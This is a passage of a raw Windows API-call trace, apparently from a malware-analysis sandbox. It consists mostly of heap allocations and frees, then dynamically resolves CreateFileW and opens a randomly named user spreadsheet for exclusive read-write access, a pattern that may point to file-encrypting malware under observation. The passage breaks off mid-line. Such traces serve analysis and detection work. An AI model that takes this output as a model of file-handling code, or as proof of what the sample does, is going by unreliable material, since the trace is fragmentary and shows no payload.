RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0175.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0175.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0175.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0175.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0175.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0175.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0175.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0175.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0175.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0175.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0175.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0175.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0175.747] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0175.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0175.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0175.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0175.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0175.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0175.747] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0175.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0175.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0175.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0175.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0175.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0175.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0175.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0175.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0175.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0175.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0175.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0175.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0175.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0175.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0175.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0175.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0175.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0175.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0175.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0175.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0175.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0175.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0175.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0175.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0175.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0175.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0175.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0175.748] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0175.748] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0175.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0175.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0175.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0175.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0175.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0175.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0175.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0175.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0175.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0175.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0175.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0175.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0175.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0175.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0175.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0175.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0175.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0175.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0175.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0175.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0175.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0175.749] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0175.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0175.749] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0175.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0175.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0175.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0175.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0175.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0175.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0175.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0175.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0175.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0175.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0175.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0175.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0175.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0175.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0175.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0175.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0175.750] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0175.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0175.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0175.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0175.750] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0175.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0175.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0175.750] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0175.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0175.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0175.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0175.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0175.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0175.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0175.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0175.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0175.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0175.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0175.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0175.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0175.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0175.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0175.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0175.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0175.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0175.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0175.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0175.751] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0175.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0175.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0175.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0175.751] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0175.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0175.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0175.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0175.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0175.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0175.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0175.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0175.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0175.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0175.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0175.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0175.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0175.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0175.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0175.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0175.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0175.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0175.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0175.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0175.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0175.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0175.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0175.752] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0175.752] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0175.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0175.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0175.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0175.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0175.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0175.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0175.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0175.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0175.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0175.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0175.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0175.753] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0175.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0175.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0175.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0175.753] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0175.753] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0175.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0175.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0175.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0175.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9f70 [0175.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9b9f70, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0175.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0175.754] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileW") returned 0x759a3f5c [0175.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0175.754] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0175.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0175.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0175.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0175.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0175.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0175.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0175.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0175.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0175.754] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20002) returned 0xa6b410 [0175.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0175.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0175.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0175.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0175.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0175.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0175.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0175.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0175.755] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\odo7bquezcp1nl2g.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0175.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0175.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0175.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0175.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0175.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0175.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0175.755] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0175.755] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0175.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0175.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0175.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0175.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0175.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0175.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0175.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0175.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0175.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6b410 | out: hHeap=0x8a0000) returned 1 [0175.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0175.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0175.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0175.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0175.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0175.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0175.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0175.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0175.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0175.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0175.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0175.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0175.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0175.756] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0175.756] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0175.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0175.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0175.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0175.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0175.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0175.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0175.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0175.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0175.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0175.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0175.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0175.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0175.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0175.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0175.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0175.757] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0175.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | 